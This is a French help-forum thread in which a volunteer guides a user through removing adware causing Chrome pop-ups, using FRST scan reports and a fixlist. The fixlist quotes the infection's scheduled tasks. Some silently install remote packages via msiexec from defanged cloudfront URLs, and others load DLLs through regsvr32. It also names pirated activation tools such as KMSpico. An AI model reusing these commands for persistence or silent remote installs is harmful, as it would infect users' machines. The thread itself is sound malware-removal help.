Signaler

Nombreuses pubs ave Counterflix [Résolu]

Posez votre question coco - Dernière réponse le 15 avril 2017 à 11:30 par Malekal_morte-
Bonjour, depuis deux jours, de nombreuses pubs apparaissent sur chrome à cause de counterflix. Je ne sais pas comment les enlever.

Pouvez-vous m'aider ?

Merci
Afficher la suite 
Utile
+0
plus moins
Salut,

En général, cet adware modifie les serveurs DNS.

Suis le tutoriel FRST. ( prends le temps de lire attentivement - tout y est bien expliqué ).

Télécharge et lance le scan FRST, 3 rapports FRST seront générés :
  • FRST.txt
  • Shortcut.txt
  • Additionnal.txt


Envoie ces 3 rapports sur le site http://pjjoint.malekal.com/ et en retour donne les 3 liens pjjoint qui mènent aux rapports ici dans une nouvelle réponse afin que l'on puisse les consulter.

Donnez votre avis
Utile
+0
plus moins
Merci pour la réponse. Voici les liens

FRST: http://pjjoint.malekal.com/files.php?id=FRST_20170414_8l13e13f14l5

Additionnal: http://pjjoint.malekal.com/files.php?id=20170414_i11t9i5j10m7

Shortcut: http://pjjoint.malekal.com/files.php?id=20170414_y13l11r12z10t8
Donnez votre avis
Utile
+0
plus moins
Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.

Ouvre le bloc-notes : Touche Windows + R,
Dans le champs "Exécuter", saisir notepad et OK.
Copie/Colle dedans ce qui suit :

CreateRestorePoint:
CloseProcesses:
HKLM\...\Providers\igt9hqh9: C:\Program Files (x86)\Ghocacultreererle Renew\local64spl.dll [307200 2017-04-12] ()
ShellExecuteHooks: Pas de nom - {0A767F30-1B4A-11E7-9EAE-64006A5CFC23} - C:\Users\marie\AppData\Roaming\Rersertainthigert\Goceshlooward.dll -> Pas de fichier
R2 WinSAPSvc; C:\Users\marie\AppData\Roaming\WinSAPSvc\WinSAP.dll [553984 2017-04-13] (winsap) [Fichier non signé]
Task: {42D44F24-B3E3-4ACB-BB65-498261F77651} - System32\Tasks\Samsung Update => msiexec /i hxxp://D2Buh1bF1G584W.CLouDfRoNT.net/mmtsk/occup.php?p=TOSHIBAXMQ01ABF050_Y6AAWY4GTXXY6AAWY4GT&d=20170413 /q
Task: {939C7363-BBA0-497E-92F8-BE606FE94625} - System32\Tasks\{E21D9614-55B6-21BF-78F6-CAF1C954CF75} => C:\ProgramData\{388509B7-8F2E-BE1C-96A1-C87EF0BFE242}\FB0BD259-4CA0-65F2-9F2D-87952A6C2DB3.exe [2017-04-13] () <==== ATTENTION
Task: {E7BB8A02-8A0E-4330-9F5B-CCDD98902C78} - \{0E780B47-7D78-7F7D-7F11-0C0B0C0B117D} -> Pas de fichier <==== ATTENTION
Task: {7423053E-F968-44C5-98F7-A809B27281FF} - System32\Tasks\Popuspclerdersh => "msiexec" /i hxxp://D2bUH1bF1g584W.clOuDfroNt.net/mmtsk/occup.php?p=TOSHIBAXMQ01ABF050_Y6AAWY4GTXXY6AAWY4GT&d=20170412 /q
Task: {9673A367-DA57-4639-A26C-71353D910C28} - System32\Tasks\{7D2DAACC-0707-A7B1-D24D-6F8AEBED1F16} => Regsvr32.exe /s /n /i:"/rt" "C:\PROGRA~3\c7cee0d\56616606.dll" <==== ATTENTION
Task: {AA7A94A8-5911-42B0-8F08-D6477D70E6B6} - System32\Tasks\PPI Update => C:\windows\explorer.exe "hxxp://insightcdn.online/download/index.php?mn=9995" <==== ATTENTION
2017-04-14 14:26 - 2017-04-14 14:26 - 01129376 _____ (Google Inc.) C:\Users\marie\Downloads\ChromeSetup (1).exe
2017-04-13 23:51 - 2017-04-13 23:51 - 00000000 ___HD C:\.~BT
2017-04-13 21:53 - 2017-04-13 21:53 - 00000000 ___HD C:\
2017-04-13 21:42 - 2017-04-13 21:53 - 00000000 ____D C:\ProgramData\c7cee0d
2017-04-13 21:42 - 2017-04-13 21:42 - 00003972 _____ C:\windows\System32\Tasks\{E21D9614-55B6-21BF-78F6-CAF1C954CF75}
2017-04-13 21:42 - 2017-04-13 21:42 - 00003878 _____ C:\windows\System32\Tasks\{7D2DAACC-0707-A7B1-D24D-6F8AEBED1F16}
2017-04-13 21:42 - 2017-04-13 21:42 - 00000000 ____D C:\ProgramData\8a6f4dd3-7d35-0
2017-04-13 21:42 - 2017-04-13 21:42 - 00000000 ____D C:\ProgramData\8a6f4dd3-35f1-0
2017-04-13 21:42 - 2017-04-13 21:42 - 00000000 ____D C:\ProgramData\{689522dd-712c-1}
2017-04-13 21:42 - 2017-04-13 21:42 - 00000000 ____D C:\ProgramData\{5b8e6739-012c-0}
2017-04-13 21:42 - 2017-04-13 21:42 - 00000000 ____D C:\ProgramData\{56614b2a-512c-1}
2017-04-13 21:42 - 2017-04-13 21:42 - 00000000 ____D C:\ProgramData\{4d0a2888-312c-0}
2017-04-13 21:42 - 2017-04-13 21:42 - 00000000 ____D C:\ProgramData\{388509B7-8F2E-BE1C-96A1-C87EF0BFE242}
2017-04-13 14:32 - 2017-04-13 14:32 - 00000000 ____D C:\Users\marie\AppData\Local\UNP
2017-04-13 13:38 - 2017-04-13 14:00 - 00005344 _____ C:\windows\System32\Tasks\Microsoft Office 15 Sync Maintenance for LAPTOP-UP611ITJ-marie LAPTOP-UP611ITJ
2017-04-13 11:54 - 2017-04-13 11:54 - 00004072 _____ C:\windows\System32\Tasks\Samsung Update
2017-04-13 08:13 - 2017-04-13 23:53 - 00000000 ____D C:\Program Files\UNP
2017-04-13 08:05 - 2017-04-13 08:05 - 00000000 ____D C:\Users\marie\AppData\Local\SNARE
2017-04-13 08:05 - 2017-04-13 08:05 - 00000000 ____D C:\Users\marie\AppData\Local\Kitty
2017-04-13 08:04 - 2017-04-13 22:11 - 00000000 ____D C:\Users\marie\AppData\Local\AMD
2017-04-13 08:04 - 2017-04-13 11:54 - 00003676 _____ C:\windows\System32\Tasks\Milimili
2017-04-13 08:04 - 2017-04-13 11:54 - 00003590 _____ C:\windows\System32\Tasks\Windows-PG
2017-04-13 08:04 - 2017-04-13 11:54 - 00000000 ____D C:\Users\marie\AppData\Roaming\WinSAPSvc
2017-04-13 08:04 - 2017-04-13 08:45 - 00000000 ____D C:\Program Files (x86)\MIO
2017-04-13 08:04 - 2017-04-13 08:04 - 00000000 ____D C:\Users\marie\AppData\Local\SNARER
2017-04-13 08:04 - 2017-04-13 08:04 - 00000000 ____D C:\Update
2017-04-13 08:00 - 2017-04-13 11:54 - 00000000 ____D C:\Program Files\MK
2017-04-13 08:00 - 2017-04-13 08:00 - 00000000 ____D C:\Program Files (x86)\MK
2017-04-13 07:59 - 2017-04-13 07:59 - 00000000 ____D C:\Program Files (x86)\igt9hqh9
2017-04-12 20:44 - 2017-04-12 08:31 - 00532136 ____N (Microsoft Corporation) C:\windows\system32\MpSigStub.exe
2017-04-12 20:39 - 2017-04-12 20:39 - 00002664 _____ C:\Users\marie\Desktop\Word 2013.lnk
2017-04-12 20:39 - 2017-04-12 20:39 - 00002660 _____ C:\Users\marie\Desktop\PowerPoint 2013.lnk
2017-04-12 20:23 - 2017-04-12 20:23 - 00564112 _____ C:\Users\marie\Downloads\favoris_12_04_2017.html
2017-04-12 20:06 - 2017-04-12 20:06 - 00004608 _____ C:\windows\SECOH-QAD.exe
2017-04-12 20:06 - 2017-04-12 20:06 - 00003584 _____ C:\windows\SECOH-QAD.dll
2017-04-12 20:05 - 2017-04-12 20:48 - 00000000 ____D C:\Program Files\KMSpico
2017-04-12 19:50 - 2017-04-13 21:58 - 00000000 ____D C:\Program Files (x86)\Mjeward
2017-04-12 19:50 - 2017-04-12 20:08 - 00000000 ____D C:\Users\marie\AppData\Roaming\Rersertainthigert
2017-04-12 19:50 - 2017-04-12 19:51 - 00000000 ____D C:\Users\marie\AppData\Local\Ghuitainshgesh
2017-04-12 19:50 - 2017-04-12 19:50 - 00006124 _____ C:\windows\System32\Tasks\Ghocacultreererle Renew
2017-04-12 19:50 - 2017-04-12 19:50 - 00006106 _____ C:\windows\System32\Tasks\Popuspclerdersh
2017-04-12 19:50 - 2017-04-12 19:50 - 00000000 ____D C:\Program Files (x86)\Ghocacultreererle Renew
2017-04-12 19:40 - 2017-04-13 21:42 - 00000000 ____D C:\ProgramData\f9addfc5-6b95-1
2017-04-12 19:40 - 2017-04-13 21:42 - 00000000 ____D C:\ProgramData\f9addfc5-1057-0
2017-04-12 19:39 - 2017-04-13 22:43 - 00000000 ____D C:\Program Files (x86)\Windows Loader
2017-04-12 19:39 - 2017-04-12 19:39 - 00003628 _____ C:\windows\System32\Tasks\PPI Update
EmptyTemp:
RemoveProxy:
Reboot:


Une fois, le texte collé dans le Bloc-notes,
Menu "Fichier" puis "Enregistrer sous",
A gauche, place toi sur le Bureau,
Dans le champs en bas, nom du fichier mets : fixlist.txt
Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.

Relance FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire ( pas obligatoire )
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.

Redémarre l'ordinateur.


2°)
Réinitialise/Répare les navigateurs WEB concernés par les problèmes :

3°)
Fais un nettoyage Malwarebytes - Tutoriel Malwarebytes Anti-Malware version gratuite

4°)
Refais un scan FRST et donne les nouveaux rapports via pjjoint


Donnez votre avis
Utile
+0
plus moins
Voici les nouveaux liens:

shortcut: http://pjjoint.malekal.com/files.php?id=20170414_h14b11u87s11

FRST: http://pjjoint.malekal.com/files.php?id=FRST_20170414_t14i14n13n15b10


Additionnal: http://pjjoint.malekal.com/files.php?id=20170414_b12p14c11l5y12
Donnez votre avis
Utile
+0
plus moins
y a du mieux ou pas ?
Donnez votre avis
Utile
+0
plus moins
Oui, il n'y a plus de pubs.

Merci
Donnez votre avis
Utile
+0
plus moins
cool =)


Supprime le dossier C:\FRST


Termine par un nettoyage Malwarebytes - Tutoriel Malwarebytes Anti-Malware version gratuite


Quelques conseils :

Pour ne plus te faire avoir.
A lire - Programmes parasites / PUPs : Dossier Adwares/PUPs : programmes indésirables et parasites
(Surtout active les détections LPIs pour détecter les programmes parasites et publicitaires)

Donnez votre avis

Les membres obtiennent plus de réponses que les utilisateurs anonymes.

Le fait d'être membre vous permet d'avoir un suivi détaillé de vos demandes.

Le fait d'être membre vous permet d'avoir des options supplémentaires.

Vous n'êtes pas encore membre ?

inscrivez-vous, c'est gratuit et ça prend moins d'une minute !